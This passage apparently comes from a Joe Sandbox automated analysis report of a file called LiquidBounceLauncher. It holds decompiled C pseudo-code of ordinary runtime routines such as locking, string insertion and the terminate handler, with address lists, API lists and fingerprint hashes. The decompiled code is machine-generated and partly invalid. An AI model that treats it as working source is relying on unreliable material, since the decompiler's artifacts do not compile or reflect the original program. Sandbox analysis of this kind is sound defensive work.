					L004AFCE0(_t28, _t30, _t31);
				}
				L2:
				abort();
				_a8 = 0x2d;
				_a4 = 1;
				 *_t32 = "terminate called without an active exception\n";
				_a12 = __imp___iob + 0x40;
				fwrite(??, ??, ??, ??);
				goto L2;
			}













                                                                                                                                                                                      0x004323ee
                                                                                                                                                                                      0x004323f1
                                                                                                                                                                                      0x00432478
                                                                                                                                                                                      0x0043247d
                                                                                                                                                                                      0x004323f7
                                                                                                                                                                                      0x004323f7
                                                                                                                                                                                      0x004323fe
                                                                                                                                                                                      0x00432403
                                                                                                                                                                                      0x00432406
                                                                                                                                                                                      0x0043240c
                                                                                                                                                                                      0x00432414
                                                                                                                                                                                      0x0043241c
                                                                                                                                                                                      0x00432423
                                                                                                                                                                                      0x00432428
                                                                                                                                                                                      0x0043242c
                                                                                                                                                                                      0x0043242f
                                                                                                                                                                                      0x00432434
                                                                                                                                                                                      0x00432438
                                                                                                                                                                                      0x0043243f
                                                                                                                                                                                      0x00432444
                                                                                                                                                                                      0x00432444
                                                                                                                                                                                      0x00432449
                                                                                                                                                                                      0x00432449
                                                                                                                                                                                      0x00432453
                                                                                                                                                                                      0x0043245b
                                                                                                                                                                                      0x00432463
                                                                                                                                                                                      0x0043246d
                                                                                                                                                                                      0x00432471
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: fwrite$abortfputcfputs
                                                                                                                                                                                      • String ID: what(): $-$terminate called without an active exception
                                                                                                                                                                                      • API String ID: 631181824-3481984820
                                                                                                                                                                                      • Opcode ID: 743965bd51c6120eecaf9c68b8099a1b34e205d68da7983c4fa1ee6873340599
                                                                                                                                                                                      • Instruction ID: 12b4fcdc8a82b4ed2ad5d28b534f79bfa7e9479393325d5de9af6c393244521e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 743965bd51c6120eecaf9c68b8099a1b34e205d68da7983c4fa1ee6873340599
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F01E8B0608710AAD3007FA6D14621EBAE0BF55748F90C82FE4C94B302D7BD98889B5B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004246B0 Relevance: 12.2, APIs: 8, Instructions: 167synchronizationCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                                                      			E004246B0() {
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t27;
				signed char _t34;
				void* _t36;
				intOrPtr* _t46;
				long _t48;
				char* _t50;
				long _t52;
				long _t53;
				long _t55;
				char* _t58;
				intOrPtr* _t62;
				intOrPtr _t69;
				char* _t71;
				char* _t72;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;
				void* _t78;
				char** _t79;

				_t79 = _t78 - 0x2c;
				_t58 = _t79[0x10];
				_t71 = _t79[0x11];
				if( *0x519034 != 0) {
					_t77 =  *0x4d2998; // 0x1
					if(_t77 == 0) {
						 *_t79 = 0x4d299c;
						_t52 = InterlockedIncrement(??);
						_t79 = _t79 - 4;
						if(_t52 != 0) {
							while(1) {
								_t72 =  *0x4d2998; // 0x1
								if(_t72 != 0) {
									goto L35;
								}
								 *_t79 = 0;
								Sleep(??);
								_t79 = _t79 - 4;
							}
						} else {
							E00423290();
							 *0x4d2998 = 1;
						}
						L35:
						if( *0x519034 != 0) {
							goto L2;
						}
					} else {
						L2:
						 *_t79 = "Library";
						_t53 = InterlockedIncrement(??);
						_t79 = _t79 - 4;
						if(_t53 != 0) {
							_t79[1] = 0xffffffff;
							 *_t79 =  *0x519094;
							_t55 = WaitForSingleObject(??, ??);
							_t79 = _t79 - 8;
							if(_t55 != 0) {
								 *_t79 = "Library";
								InterlockedDecrement(??);
								_t79 = _t79 - 4;
							}
						}
					}
				}
				_t75 =  *0x519098;
				if(_t75 == 0) {
					goto L9;
				} else {
					if(_t58 <  *_t75) {
						while(1) {
							_t76 =  *((intOrPtr*)(_t75 + 0x14));
							if(_t76 == 0) {
								goto L9;
							}
							if( *_t76 <= _t58) {
								goto L22;
							} else {
								continue;
							}
							goto L40;
						}
						goto L9;
					} else {
						L22:
						_t50 = L00423A30(_t76, _t58, _t71, _t72);
						_t72 = _t50;
						if(_t50 == 0) {
							while(1) {
								L9:
								_t76 = "tCommandLineA";
								if(_t76 == 0) {
									break;
								}
								"tCommandLineA" =  *((intOrPtr*)(_t76 + 0x14));
								_t72 = L00423A30(_t76, _t58, _t71, _t72);
								_t46 =  *0x519098;
								if(_t46 == 0) {
									L20:
									 *((intOrPtr*)(_t76 + 0x14)) = _t46;
									 *0x519098 = _t76;
									if(_t72 == 0) {
										continue;
									} else {
										goto L16;
									}
								} else {
									_t69 =  *_t76;
									if( *_t46 >= _t69) {
										while(1) {
											_t62 = _t46 + 0x14;
											_t46 =  *((intOrPtr*)(_t46 + 0x14));
											if(_t46 == 0) {
												break;
											}
											if( *_t46 >= _t69) {
												continue;
											}
											break;
										}
										 *((intOrPtr*)(_t76 + 0x14)) = _t46;
										 *_t62 = _t76;
										if(_t72 == 0) {
											continue;
										} else {
											L16:
											if( *0x519034 != 0) {
												goto L24;
											} else {
												goto L17;
											}
										}
									} else {
										goto L20;
									}
								}
								goto L40;
							}
							if( *0x519034 == 0) {
								goto L29;
							} else {
								 *_t79 = "Library";
								_t27 = InterlockedDecrement(??);
								_t79 = _t79 - 4;
								if(_t27 < 0) {
									goto L29;
								} else {
									goto L28;
								}
							}
						} else {
							if( *0x519034 == 0) {
								L17:
								 *_t71 =  *(_t76 + 4);
								_t71[4] =  *(_t76 + 8);
								if(( *(_t76 + 0x10) & 0x00000004) != 0) {
									_t34 = E00423520(4 -  *((intOrPtr*)(4)));
								} else {
									_t34 = ( *(_t76 + 0x10) & 0x0000ffff) >> 0x00000003 & 0x000000ff;
								}
								_t36 = E00423330(_t34 & 0x000000ff, _t76);
								 *_t79 =  &(_t79[7]);
								E00423370(_t34 & 0x000000ff, 8, _t36);
								_t71[8] = _t79[7];
								return 0;
							} else {
								L24:
								 *_t79 = "Library";
								_t48 = InterlockedDecrement(??);
								_t79 = _t79 - 4;
								if(_t48 >= 0) {
									L28:
									_t79[2] = 0;
									_t79[1] = 1;
									 *_t79 =  *0x519094;
									ReleaseSemaphore(??, ??, ??);
									_t79 = _t79 - 0xc;
									if(0 != 0) {
										goto L17;
									} else {
										L29:
										return 0;
									}
								} else {
									goto L17;
								}
							}
						}
					}
				}
				L40:
			}

























                                                                                                                                                                                      0x004246b4
                                                                                                                                                                                      0x004246bc
                                                                                                                                                                                      0x004246c0
                                                                                                                                                                                      0x004246c6
                                                                                                                                                                                      0x004246c8
                                                                                                                                                                                      0x004246d0
                                                                                                                                                                                      0x0042487b
                                                                                                                                                                                      0x00424882
                                                                                                                                                                                      0x00424887
                                                                                                                                                                                      0x0042488c
                                                                                                                                                                                      0x0042489f
                                                                                                                                                                                      0x0042489f
                                                                                                                                                                                      0x004248a7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424890
                                                                                                                                                                                      0x00424897
                                                                                                                                                                                      0x0042489c
                                                                                                                                                                                      0x0042489c
                                                                                                                                                                                      0x0042488e
                                                                                                                                                                                      0x004248f0
                                                                                                                                                                                      0x004248f5
                                                                                                                                                                                      0x004248f5
                                                                                                                                                                                      0x004248a9
                                                                                                                                                                                      0x004248b1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004248b7
                                                                                                                                                                                      0x004246d6
                                                                                                                                                                                      0x004246d6
                                                                                                                                                                                      0x004246d6
                                                                                                                                                                                      0x004246dd
                                                                                                                                                                                      0x004246e2
                                                                                                                                                                                      0x004246e7
                                                                                                                                                                                      0x004248c1
                                                                                                                                                                                      0x004248c9
                                                                                                                                                                                      0x004248cc
                                                                                                                                                                                      0x004248d1
                                                                                                                                                                                      0x004248d6
                                                                                                                                                                                      0x004248dc
                                                                                                                                                                                      0x004248e3
                                                                                                                                                                                      0x004248e8
                                                                                                                                                                                      0x004248e8
                                                                                                                                                                                      0x004248d6
                                                                                                                                                                                      0x004246e7
                                                                                                                                                                                      0x004246d0
                                                                                                                                                                                      0x004246f0
                                                                                                                                                                                      0x004246f8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004246fa
                                                                                                                                                                                      0x004246fd
                                                                                                                                                                                      0x0042470d
                                                                                                                                                                                      0x0042470d
                                                                                                                                                                                      0x00424712
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424707
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424707
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004246ff
                                                                                                                                                                                      0x004247e0
                                                                                                                                                                                      0x004247e4
                                                                                                                                                                                      0x004247eb
                                                                                                                                                                                      0x004247ed
                                                                                                                                                                                      0x00424714
                                                                                                                                                                                      0x00424714
                                                                                                                                                                                      0x00424714
                                                                                                                                                                                      0x0042471c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424727
                                                                                                                                                                                      0x00424733
                                                                                                                                                                                      0x00424735
                                                                                                                                                                                      0x0042473c
                                                                                                                                                                                      0x004247c4
                                                                                                                                                                                      0x004247cb
                                                                                                                                                                                      0x004247ce
                                                                                                                                                                                      0x004247d0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004247d6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004247d6
                                                                                                                                                                                      0x00424742
                                                                                                                                                                                      0x00424742
                                                                                                                                                                                      0x00424747
                                                                                                                                                                                      0x00424754
                                                                                                                                                                                      0x00424754
                                                                                                                                                                                      0x00424757
                                                                                                                                                                                      0x0042475c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424752
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424752
                                                                                                                                                                                      0x00424760
                                                                                                                                                                                      0x00424763
                                                                                                                                                                                      0x00424765
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424767
                                                                                                                                                                                      0x00424767
                                                                                                                                                                                      0x0042476e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042476e
                                                                                                                                                                                      0x00424749
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424749
                                                                                                                                                                                      0x00424747
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042473c
                                                                                                                                                                                      0x00424820
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424822
                                                                                                                                                                                      0x00424822
                                                                                                                                                                                      0x0042482b
                                                                                                                                                                                      0x00424830
                                                                                                                                                                                      0x00424835
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424835
                                                                                                                                                                                      0x004247f3
                                                                                                                                                                                      0x004247fa
                                                                                                                                                                                      0x00424774
                                                                                                                                                                                      0x00424777
                                                                                                                                                                                      0x0042477c
                                                                                                                                                                                      0x00424783
                                                                                                                                                                                      0x00424871
                                                                                                                                                                                      0x00424789
                                                                                                                                                                                      0x00424791
                                                                                                                                                                                      0x00424791
                                                                                                                                                                                      0x0042479b
                                                                                                                                                                                      0x004247a7
                                                                                                                                                                                      0x004247ae
                                                                                                                                                                                      0x004247b7
                                                                                                                                                                                      0x004247c3
                                                                                                                                                                                      0x00424800
                                                                                                                                                                                      0x00424800
                                                                                                                                                                                      0x00424800
                                                                                                                                                                                      0x00424807
                                                                                                                                                                                      0x0042480c
                                                                                                                                                                                      0x00424811
                                                                                                                                                                                      0x00424837
                                                                                                                                                                                      0x0042483c
                                                                                                                                                                                      0x00424844
                                                                                                                                                                                      0x0042484c
                                                                                                                                                                                      0x0042484f
                                                                                                                                                                                      0x00424854
                                                                                                                                                                                      0x00424859
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042485f
                                                                                                                                                                                      0x0042485f
                                                                                                                                                                                      0x0042486a
                                                                                                                                                                                      0x0042486a
                                                                                                                                                                                      0x00424813
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00424813
                                                                                                                                                                                      0x00424811
                                                                                                                                                                                      0x004247fa
                                                                                                                                                                                      0x004247ed
                                                                                                                                                                                      0x004246fd
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InterlockedIncrement.KERNEL32 ref: 004246DD
                                                                                                                                                                                      • InterlockedDecrement.KERNEL32 ref: 00424807
                                                                                                                                                                                      • InterlockedIncrement.KERNEL32 ref: 00424882
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32 ref: 004248CC
                                                                                                                                                                                      • InterlockedDecrement.KERNEL32 ref: 004248E3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Interlocked$DecrementIncrement$ObjectSingleWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3562603859-0
                                                                                                                                                                                      • Opcode ID: 52abc7e9fe443c6d111f8321aeca2c91967ccea8f74e4dcab43372cbc6044aea
                                                                                                                                                                                      • Instruction ID: 4a4906ff523c1861164b159f9060fc4ffc9b487335b5a03faeb948727a467400
                                                                                                                                                                                      • Opcode Fuzzy Hash: 52abc7e9fe443c6d111f8321aeca2c91967ccea8f74e4dcab43372cbc6044aea
                                                                                                                                                                                      • Instruction Fuzzy Hash: E051AB78B002718BC720EF29F64026B77E4EB95744F81413EEC598B311E778D949CBAA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00401000 Relevance: 12.1, APIs: 8, Instructions: 82COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: signal
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1946981877-0
                                                                                                                                                                                      • Opcode ID: f6242cac8ec263527f127eb7223a68532c5b24d0763d620f13e52c4c7cc7bd16
                                                                                                                                                                                      • Instruction ID: 26efdf9d60ad7f765a01704988a72e9d5cecc8397a79b7389bf4768519f4ac8d
                                                                                                                                                                                      • Opcode Fuzzy Hash: f6242cac8ec263527f127eb7223a68532c5b24d0763d620f13e52c4c7cc7bd16
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC31AD701042409AE7206B68C55436F76D0BF46378F124A2FE5EA977E1C7BEC8C4975B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00429370 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _errno$_fullpathmallocmemcpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3274612330-0
                                                                                                                                                                                      • Opcode ID: 71d84fd0007b846bc5662ac5050b184c046d878872b1b1b750f4b1b446f59041
                                                                                                                                                                                      • Instruction ID: 11e747a64f23aa7ce18854d7f42e6acc88f5a619fa3e1a30d089f0eaf4a17775
                                                                                                                                                                                      • Opcode Fuzzy Hash: 71d84fd0007b846bc5662ac5050b184c046d878872b1b1b750f4b1b446f59041
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2841EA713086248BE714AF29E8427A7B7E1EF85304F88466FD884C7395D67C9C8AC799
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004242A0 Relevance: 10.6, APIs: 7, Instructions: 80synchronizationCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InterlockedIncrement.KERNEL32 ref: 004242F6
                                                                                                                                                                                      • InterlockedDecrement.KERNEL32 ref: 00424325
                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32 ref: 00424349
                                                                                                                                                                                      • InterlockedIncrement.KERNEL32 ref: 00424397
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32 ref: 004243D0
                                                                                                                                                                                      • InterlockedDecrement.KERNEL32 ref: 004243E3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Interlocked$DecrementIncrement$ObjectReleaseSemaphoreSingleWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2605429255-0
                                                                                                                                                                                      • Opcode ID: 7fe3a1f9542ec86e63f7ce1346f5320d4ae3e8720f8b3621b3cbe339b8a1d104
                                                                                                                                                                                      • Instruction ID: 4151307fbbdb9c0d17a03e25bf36fc04c8dd760f31a7880ea61f0dfb13cedbbf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fe3a1f9542ec86e63f7ce1346f5320d4ae3e8720f8b3621b3cbe339b8a1d104
                                                                                                                                                                                      • Instruction Fuzzy Hash: ED31ABB0B002218BD700EF39E69970A7BF0FB58714F81866EDC888B315E378D549CB5A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00428509 Relevance: 9.2, APIs: 6, Instructions: 173stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: mallocstrlen$_strdup_stricollfreememcpystrcoll
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 248952651-0
                                                                                                                                                                                      • Opcode ID: 96291c2fd84314d3d38659e05e81047f4947d4e4142a865562aaa9c0d6c4dc03
                                                                                                                                                                                      • Instruction ID: cb41830925d5efafd0dc449b17514f97a8509192fd03f7099b6846154973f4f3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 96291c2fd84314d3d38659e05e81047f4947d4e4142a865562aaa9c0d6c4dc03
                                                                                                                                                                                      • Instruction Fuzzy Hash: 346181B1E062258FDB10CFA9D48079EBBF1BF54344F88846EE855AB301EB78E845CB55
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00478000 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                      • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert
                                                                                                                                                                                      • API String ID: 3510742995-684465245
                                                                                                                                                                                      • Opcode ID: bfeb6bc020c2adccb5f0de8545b575cc6608c9d0e05fd466b8b4df8ea49132cb
                                                                                                                                                                                      • Instruction ID: 57e757c977f31dab10b2ce2af0a0c2f5123638c89593625a1f0d1e63c1784291
                                                                                                                                                                                      • Opcode Fuzzy Hash: bfeb6bc020c2adccb5f0de8545b575cc6608c9d0e05fd466b8b4df8ea49132cb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6251A171A483949FC300AF2DC4885AEBBE0FF95304F55C92FE98C87311DA798949CB5A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00436330 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: setlocale$memcpystrlenwcsftime
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3412479102-0
                                                                                                                                                                                      • Opcode ID: 6d8721e3a97c91cd37f3e3f9f73d914a67cc8f453320605db94f086036acbf3b
                                                                                                                                                                                      • Instruction ID: a008ae999ad8cba0c6d27a16619e34351dce8aff385bb900a4ab791509566ebb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8721e3a97c91cd37f3e3f9f73d914a67cc8f453320605db94f086036acbf3b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C11D6B06193109FC340BF6AD08561FBBF4AF98754F81883EF4C887311E7B898448B56
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00436080 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON
                                                                                                                                                                                      Download Yara Rule
